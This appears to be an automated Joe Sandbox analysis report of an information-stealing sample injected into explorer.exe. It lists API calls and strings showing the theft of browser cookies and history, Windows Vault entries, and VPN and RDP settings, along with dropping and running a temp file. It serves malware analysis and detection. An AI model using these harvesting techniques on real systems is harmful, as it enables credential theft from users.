Function 00007FF780B69478 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81timesynchronizationCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF780B694BF
WaitForSingleObject.KERNEL32 ref: 00007FF780B69505
GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF780B69517
TerminateProcess.KERNEL32 ref: 00007FF780B6953A

Part of subcall function 00007FF780B6968C: PeekNamedPipe.KERNELBASE ref: 00007FF780B696B8

GetExitCodeProcess.KERNEL32 ref: 00007FF780B69585
CloseHandle.KERNEL32 ref: 00007FF780B69593

Strings

exit, xrefs: 00007FF780B69482

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: Time$FileProcessSystem$CloseCodeExitHandleNamedObjectPeekPipeSingleTerminateWait
String ID: exit
API String ID: 1626563136-1626635026
Opcode ID: e8db0668784a4e42b00b615d6c0ccb33bfa89d96bba3dbda8ec61e812724d3ba
Instruction ID: 01ec87b187e051c685db612c1f7a06f5b83e82e774a5d57606b4bc574a1e5f5d
Opcode Fuzzy Hash: e8db0668784a4e42b00b615d6c0ccb33bfa89d96bba3dbda8ec61e812724d3ba
Instruction Fuzzy Hash: 93315026A0A64285EF90EF29DC50179AB65FF94B84FE41432DA1F867D9DF2CF845C320

Function 00007FF780B61EEC Relevance: 12.2, APIs: 8, Instructions: 152commemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF780B61DE8: RegCreateKeyExA.ADVAPI32 ref: 00007FF780B61E35

CoInitializeEx.OLE32 ref: 00007FF780B61F1E
VariantInit.OLEAUT32 ref: 00007FF780B61F28
CoCreateInstance.OLE32 ref: 00007FF780B61F50
SysAllocString.OLEAUT32 ref: 00007FF780B61F61
SafeArrayCreateVector.OLEAUT32 ref: 00007FF780B61F7D
SafeArrayAccessData.OLEAUT32 ref: 00007FF780B61F93
SafeArrayUnaccessData.OLEAUT32 ref: 00007FF780B61FAC
SysFreeString.OLEAUT32 ref: 00007FF780B62111

Part of subcall function 00007FF780B61CBC: GetTempPathA.KERNEL32 ref: 00007FF780B61CF7
Part of subcall function 00007FF780B61CBC: GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF780B61D04
Part of subcall function 00007FF780B61CBC: wsprintfA.USER32 ref: 00007FF780B61D1C
Part of subcall function 00007FF780B61CBC: CreateFileA.KERNEL32 ref: 00007FF780B61D56
Part of subcall function 00007FF780B61CBC: WriteFile.KERNEL32 ref: 00007FF780B61D88
Part of subcall function 00007FF780B61CBC: CloseHandle.KERNEL32 ref: 00007FF780B61DA9
Part of subcall function 00007FF780B61CBC: ShellExecuteA.SHELL32 ref: 00007FF780B61DCE

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: Create$ArrayFileSafe$DataStringTime$AccessAllocCloseExecuteFreeHandleInitInitializeInstancePathShellSystemTempUnaccessVariantVectorWritewsprintf
String ID:
API String ID: 1750269033-0
Opcode ID: 24e8de18f55c2aa4b7ce6dc9423715127756d38879f1172464cba5bf6f043b18
Instruction ID: ebc5d8a7ac7ed36ae23b1f4869d7f4a75c108ee83af278c2946af11a4f227ab2
Opcode Fuzzy Hash: 24e8de18f55c2aa4b7ce6dc9423715127756d38879f1172464cba5bf6f043b18
Instruction Fuzzy Hash: 8C616636B08A069AFB04EFA9D8543AC67B0FB48B88F944531CE0E57795DF39E509C360

Function 00007FF780B6EED8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF780B625DC: GetProcessHeap.KERNEL32(?,?,?,00007FF780B61985,?,?,?,00007FF780B6155F), ref: 00007FF780B625E5

__memcpy.DELAYIMP ref: 00007FF780B6EF5F

Part of subcall function 00007FF780B70110: __memcpy.DELAYIMP ref: 00007FF780B70141
Part of subcall function 00007FF780B70110: __memcpy.DELAYIMP ref: 00007FF780B7014F

Part of subcall function 00007FF780B6EB90: lstrlenA.KERNEL32 ref: 00007FF780B6EBAD

Part of subcall function 00007FF780B625B4: GetProcessHeap.KERNEL32 ref: 00007FF780B625C1
Part of subcall function 00007FF780B625B4: HeapFree.KERNEL32 ref: 00007FF780B625CF

Strings

moz_places, xrefs: 00007FF780B6EF28
table, xrefs: 00007FF780B6EF0A
url, xrefs: 00007FF780B6EFA8
last_visit_date, xrefs: 00007FF780B6EFBB

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: Heap__memcpy$Process$Freelstrlen
String ID: last_visit_date$moz_places$table$url
API String ID: 2336645791-66087218
Opcode ID: f38da07e03cbde2d6eedd0ecfeac677a508d5f57210bb8e2029f5f43fc229cd4
Instruction ID: 1a993f737dc28ed1f4cb59f27eeb0ee0d83fd507c41597f39bebb32da85ee198
Opcode Fuzzy Hash: f38da07e03cbde2d6eedd0ecfeac677a508d5f57210bb8e2029f5f43fc229cd4
Instruction Fuzzy Hash: DC31A72660964391EA30EB26EC501AAAB50FB817C0FA04032DF6F477D6EE7DF446C720

Function 00007FF780B6F104 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF780B625DC: GetProcessHeap.KERNEL32(?,?,?,00007FF780B61985,?,?,?,00007FF780B6155F), ref: 00007FF780B625E5

__memcpy.DELAYIMP ref: 00007FF780B6F18B

Part of subcall function 00007FF780B70110: __memcpy.DELAYIMP ref: 00007FF780B70141
Part of subcall function 00007FF780B70110: __memcpy.DELAYIMP ref: 00007FF780B7014F

Part of subcall function 00007FF780B6EB90: lstrlenA.KERNEL32 ref: 00007FF780B6EBAD

Part of subcall function 00007FF780B625B4: GetProcessHeap.KERNEL32 ref: 00007FF780B625C1
Part of subcall function 00007FF780B625B4: HeapFree.KERNEL32 ref: 00007FF780B625CF

Strings

table, xrefs: 00007FF780B6F136
urls, xrefs: 00007FF780B6F154
last_visit_time, xrefs: 00007FF780B6F1E7
url, xrefs: 00007FF780B6F1D4

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: Heap__memcpy$Process$Freelstrlen
String ID: last_visit_time$table$url$urls
API String ID: 2336645791-3896411411
Opcode ID: 0c4fee5880e61eb94df5693f691bb6de24a1f0fa76f2d61ad8181ac8000b3ec7
Instruction ID: cdb6942aaa9d42bd11daa5b91f07328bec973554017e62ef419b3cb6b9f0e72a
Opcode Fuzzy Hash: 0c4fee5880e61eb94df5693f691bb6de24a1f0fa76f2d61ad8181ac8000b3ec7
Instruction Fuzzy Hash: 3831986560864782EA30EB66EC505AAAB50FB80BC0FA04032EE6F477D5EE7CF445D720

Function 00007FF780B6ECB8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF780B625DC: GetProcessHeap.KERNEL32(?,?,?,00007FF780B61985,?,?,?,00007FF780B6155F), ref: 00007FF780B625E5

__memcpy.DELAYIMP ref: 00007FF780B6ED3F

Part of subcall function 00007FF780B70110: __memcpy.DELAYIMP ref: 00007FF780B70141
Part of subcall function 00007FF780B70110: __memcpy.DELAYIMP ref: 00007FF780B7014F

Part of subcall function 00007FF780B6EB90: lstrlenA.KERNEL32 ref: 00007FF780B6EBAD

Part of subcall function 00007FF780B625B4: GetProcessHeap.KERNEL32 ref: 00007FF780B625C1
Part of subcall function 00007FF780B625B4: HeapFree.KERNEL32 ref: 00007FF780B625CF

Strings

table, xrefs: 00007FF780B6ECEA
urls, xrefs: 00007FF780B6ED08
last_visit_time, xrefs: 00007FF780B6ED9B
url, xrefs: 00007FF780B6ED88

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: Heap__memcpy$Process$Freelstrlen
String ID: last_visit_time$table$url$urls
API String ID: 2336645791-3896411411
Opcode ID: 1c93a10fbc3946b32b9c1c3552dd529b664ad3f7a8e60a624f2853011b0a5704
Instruction ID: 5fb5faa8316bd31f70e9a0c7251b2ace73008267a2bcd8361aff4853c329cd56
Opcode Fuzzy Hash: 1c93a10fbc3946b32b9c1c3552dd529b664ad3f7a8e60a624f2853011b0a5704
Instruction Fuzzy Hash: 9B319A2561868382EE60EB26EC505EAAB50FB417C4FA04032DE6F477D5EE7DF455C720

Function 00007FF780B6E3A8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32 ref: 00007FF780B6E3D8
PathAppendW.SHLWAPI ref: 00007FF780B6E3E6

Strings

Software\Fortinet\FortiClient\Sslvpn\Tunnels, xrefs: 00007FF780B6E3CC
"},, xrefs: 00007FF780B6E49B
":", xrefs: 00007FF780B6E47D

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: AppendPathlstrcpy
String ID: ":"$"},$Software\Fortinet\FortiClient\Sslvpn\Tunnels
API String ID: 3043196718-4231764533
Opcode ID: fca46f4a48f03f188689557114f794a6a07c4ac55cb5b740c56f1d9bebc21b67
Instruction ID: 8c185766f96dc1fb3dce3be270d4215b1611a3ca4e8c58dd5c641a525afe8b88
Opcode Fuzzy Hash: fca46f4a48f03f188689557114f794a6a07c4ac55cb5b740c56f1d9bebc21b67
Instruction Fuzzy Hash: B631A175614A8185DB20EF65E8141A9A761FB88BC0FA84531DE6E077C9DF3CE504CB10

Function 00007FF780B61DE8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32 ref: 00007FF780B61E35
RegSetValueExA.ADVAPI32 ref: 00007FF780B61EBE
RegCloseKey.ADVAPI32 ref: 00007FF780B61ED1

Strings

?, xrefs: 00007FF780B61E29

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: CloseCreateValue
String ID: ?
API String ID: 1818849710-1684325040
Opcode ID: 3ac2c5a9dac42fe89f51ed52893421167f8e036ef2170a4c1e30b2534ed343c4
Instruction ID: 1abe9c89fb4673ef7accaeffbc2865f10e9dd4575e9cc3a633034deeb3f6007b
Opcode Fuzzy Hash: 3ac2c5a9dac42fe89f51ed52893421167f8e036ef2170a4c1e30b2534ed343c4
Instruction Fuzzy Hash: C321A777A147808EE7209F75A8401EDBBB4FB48798B554225DE9D07B99DB3CD144CB20

Function 00007FF780B6E600 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32 ref: 00007FF780B6E61F
PathAppendW.SHLWAPI ref: 00007FF780B6E62D

Part of subcall function 00007FF780B6CCF4: RegGetValueW.ADVAPI32 ref: 00007FF780B6CD33
Part of subcall function 00007FF780B6CCF4: RegGetValueW.ADVAPI32 ref: 00007FF780B6CD72

Part of subcall function 00007FF780B625B4: GetProcessHeap.KERNEL32 ref: 00007FF780B625C1
Part of subcall function 00007FF780B625B4: HeapFree.KERNEL32 ref: 00007FF780B625CF

Strings

"},, xrefs: 00007FF780B6E6AB
Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles, xrefs: 00007FF780B6E613

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: HeapValue$AppendFreePathProcesslstrcpy
String ID: "},$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles
API String ID: 784796242-1893226844
Opcode ID: 169641714641a2eeff94ccdc9b97ea7e64463ef1d9d5ea44a42bb8b376bf92de
Instruction ID: 0462cd1d11d9b85c5db0e67679d951ff9ecb2b0cb51f7e8678427a7cba9ea491
Opcode Fuzzy Hash: 169641714641a2eeff94ccdc9b97ea7e64463ef1d9d5ea44a42bb8b376bf92de
Instruction Fuzzy Hash: 45115115A0868254DE20FB56EC692FAD711FF84BC0F985531EAAF4B7DADE2CE105C720

Function 00007FF780B6CBF0 Relevance: 6.1, APIs: 4, Instructions: 61registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF780B6CC35
RegEnumKeyExW.ADVAPI32 ref: 00007FF780B6CC6F
RegEnumKeyExW.ADVAPI32 ref: 00007FF780B6CCBE
RegCloseKey.ADVAPI32 ref: 00007FF780B6CCCD

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: Enum$CloseOpen
String ID:
API String ID: 1701607978-0
Opcode ID: 416c5c68e5041cda3919146f9132f3cad043645ab3bbea6a523ac74fa5a0f50e
Instruction ID: 46f9932bf92f103935f35bb86d07e976a2e46a990931fb231ff6401397f9b2dc
Opcode Fuzzy Hash: 416c5c68e5041cda3919146f9132f3cad043645ab3bbea6a523ac74fa5a0f50e
Instruction Fuzzy Hash: 46216933618B8586D3108F15E88476AB7B4F788B84F640236EB8D43B58CF3DE559CB50

Function 00007FF780B6E4D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32 ref: 00007FF780B6E4FC
PathAppendW.SHLWAPI ref: 00007FF780B6E50A

Part of subcall function 00007FF780B6CCF4: RegGetValueW.ADVAPI32 ref: 00007FF780B6CD33
Part of subcall function 00007FF780B6CCF4: RegGetValueW.ADVAPI32 ref: 00007FF780B6CD72

Strings

Software\Microsoft\Terminal Server Client\Servers, xrefs: 00007FF780B6E4F0

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: Value$AppendPathlstrcpy
String ID: Software\Microsoft\Terminal Server Client\Servers
API String ID: 19203174-1233151749
Opcode ID: f22770c626a287e8e80e15e2856392f6d1f6e478edd3b45d1de5ed20fdf75b49
Instruction ID: 40bc7fd42f699eb5a8743c6ef91a064269b7e8f9e9edfa891d4595a5161dc69d
Opcode Fuzzy Hash: f22770c626a287e8e80e15e2856392f6d1f6e478edd3b45d1de5ed20fdf75b49
Instruction Fuzzy Hash: 7F21A26561898285DB20FF61DC242F9A751FB887C0FA84531EA6E4B7D9DE2CE605C710

Function 00007FF780B6FDDC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF780B6FE0D
lstrcatW.KERNEL32 ref: 00007FF780B6FE1A

Part of subcall function 00007FF780B6FF38: lstrlenW.KERNEL32 ref: 00007FF780B6FF5E
Part of subcall function 00007FF780B6FF38: lstrlenW.KERNEL32 ref: 00007FF780B6FF7A
Part of subcall function 00007FF780B6FF38: WideCharToMultiByte.KERNEL32 ref: 00007FF780B6FFA3
Part of subcall function 00007FF780B6FF38: PathFileExistsA.SHLWAPI ref: 00007FF780B6FFAC
Part of subcall function 00007FF780B6FF38: OpenFile.KERNEL32 ref: 00007FF780B6FFC5
Part of subcall function 00007FF780B6FF38: GetFileSize.KERNEL32 ref: 00007FF780B6FFE5
Part of subcall function 00007FF780B6FF38: CreateFileMappingA.KERNEL32 ref: 00007FF780B7001C
Part of subcall function 00007FF780B6FF38: MapViewOfFile.KERNEL32 ref: 00007FF780B7003D
Part of subcall function 00007FF780B6FF38: __memcpy.DELAYIMP ref: 00007FF780B7004F
Part of subcall function 00007FF780B6FF38: UnmapViewOfFile.KERNEL32 ref: 00007FF780B7005A
Part of subcall function 00007FF780B6FF38: CloseHandle.KERNEL32 ref: 00007FF780B70063
Part of subcall function 00007FF780B6FF38: CloseHandle.KERNEL32 ref: 00007FF780B7006C

Part of subcall function 00007FF780B6F27C: __memcpy.DELAYIMP ref: 00007FF780B6F29A

Part of subcall function 00007FF780B625B4: GetProcessHeap.KERNEL32 ref: 00007FF780B625C1
Part of subcall function 00007FF780B625B4: HeapFree.KERNEL32 ref: 00007FF780B625CF

Strings

APPDATA, xrefs: 00007FF780B6FE06

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: File$CloseHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcat
String ID: APPDATA
API String ID: 2395011915-4054820676
Opcode ID: 1c5aadbc771fdada102cf90f1d560a23c7010e43b89a1500ae84cb532174cc29
Instruction ID: d058919f0e1308bae7fe91b8f0c24055b402c0b39545ca16d492dd49dafeba77
Opcode Fuzzy Hash: 1c5aadbc771fdada102cf90f1d560a23c7010e43b89a1500ae84cb532174cc29
Instruction Fuzzy Hash: 9A118126628A4395EB20EB14E8445EDB760FB84784FD04031EA5E87B99EF3CE509CB10

Analysis Process: explorer.exePID: 1012, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	50.4%
Signature Coverage:	3.2%
Total number of Nodes:	786
Total number of Limit Nodes:	87

Executed Functions

Function 00C33717 Relevance: 45.9, APIs: 19, Strings: 7, Instructions: 401
stringfileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C31B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00C32893,00000000,00000000,00000000,?), ref: 00C31B82
Part of subcall function 00C31B6A: CloseHandle.KERNELBASE(00000000), ref: 00C31B8F

GetTempPathW.KERNEL32(00000104,00000000), ref: 00C33778
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00C33782
DeleteFileW.KERNELBASE(00000000), ref: 00C33789
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00C33794
RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 00C3383B
RtlZeroMemory.NTDLL(?,00000040), ref: 00C33870
lstrlen.KERNEL32(?,?,?,?,?), ref: 00C3398B
lstrlen.KERNEL32(00000000), ref: 00C3399A
wsprintfA.USER32 ref: 00C339F1
lstrlen.KERNEL32(00000000,?,?), ref: 00C339FD
lstrcat.KERNEL32(00000000,?), ref: 00C33A21
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C33A49
lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00C33B13
lstrlen.KERNEL32(00000000), ref: 00C33B22
wsprintfA.USER32 ref: 00C33B79
lstrlen.KERNEL32(00000000), ref: 00C33B85
lstrcat.KERNEL32(00000000,?), ref: 00C33BA9
lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00C33BDA
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00C33C16

Strings

0, xrefs: 00C33828
COOKIES, xrefs: 00C33BE8, 00C33BED, 00C33BF6
TRUE, xrefs: 00C339C9, 00C33B51
SELECT host_key,path,is_secure,name,encrypted_value FROM cookies, xrefs: 00C337C3
v1, xrefs: 00C33821
FALSE, xrefs: 00C339BC, 00C33B3C
%sTRUE%s%s%s%s%s, xrefs: 00C339EB, 00C33B73

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
API String ID: 584740257-404540950
Opcode ID: dd448d6c890c140a3b5f47ac9d3636764b05076d19833e3cc29fc4ca58b14530
Instruction ID: e1e57b84fcbd98ed3cafc2bd1464684d6fd0cf026ca560ca4876844b4197ac7d
Opcode Fuzzy Hash: dd448d6c890c140a3b5f47ac9d3636764b05076d19833e3cc29fc4ca58b14530
Instruction Fuzzy Hash: 46E1AB70218381AFD715DF64C884F2FBBE9AF89354F08482CF89587291DB35CA05DB56

Function 00C32198 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 242
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.NTDLL(?,00000114), ref: 00C321AF
GetVersionExW.KERNEL32(?), ref: 00C321BE
LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 00C321E8
GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 00C3220A
GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 00C32214
GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00C32220
GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00C3222A
GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00C32236
RtlCompareMemory.NTDLL(?,00C91110,00000010), ref: 00C322E8
RtlCompareMemory.NTDLL(?,00C91110,00000010), ref: 00C3236C

Part of subcall function 00C31953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00C32F0C), ref: 00C31973
Part of subcall function 00C31953: lstrlenW.KERNEL32(00C86564,?,?,00C32F0C), ref: 00C31978
Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,?,?,?,00C32F0C), ref: 00C31990
Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,00C86564,?,?,00C32F0C), ref: 00C31994

StrStrIW.SHLWAPI(?,Internet Explorer), ref: 00C323FE
FreeLibrary.KERNELBASE(00000000), ref: 00C32493

Strings

VaultFree, xrefs: 00C3222C
VaultEnumerateItems, xrefs: 00C32216
vaultcli.dll, xrefs: 00C321E3
Internet Explorer, xrefs: 00C323F8
VaultOpenVault, xrefs: 00C32204
VaultCloseVault, xrefs: 00C3220C
VaultGetItem, xrefs: 00C32222

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
API String ID: 2583887280-2831467701
Opcode ID: cc6e136b955fe0ff2f4f0494d1f503e3c6359048dc78e24a152f3692898d4d52
Instruction ID: e1667eb7d144a0e88ae16231f30888bed0eea4b722bc6f480b72d4bc9e13e19b
Opcode Fuzzy Hash: cc6e136b955fe0ff2f4f0494d1f503e3c6359048dc78e24a152f3692898d4d52
Instruction Fuzzy Hash: AF919971A283019FDB18EF65C884A2FBBE9AF88704F04482DF99597261EB71DD01CB56

Function 00C33098 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 248
fileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C31B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00C32893,00000000,00000000,00000000,?), ref: 00C31B82
Part of subcall function 00C31B6A: CloseHandle.KERNELBASE(00000000), ref: 00C31B8F

GetTempPathW.KERNEL32(00000104,00000000), ref: 00C330F9
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00C33103
DeleteFileW.KERNELBASE(00000000), ref: 00C3310A
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00C33115
RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 00C331A4
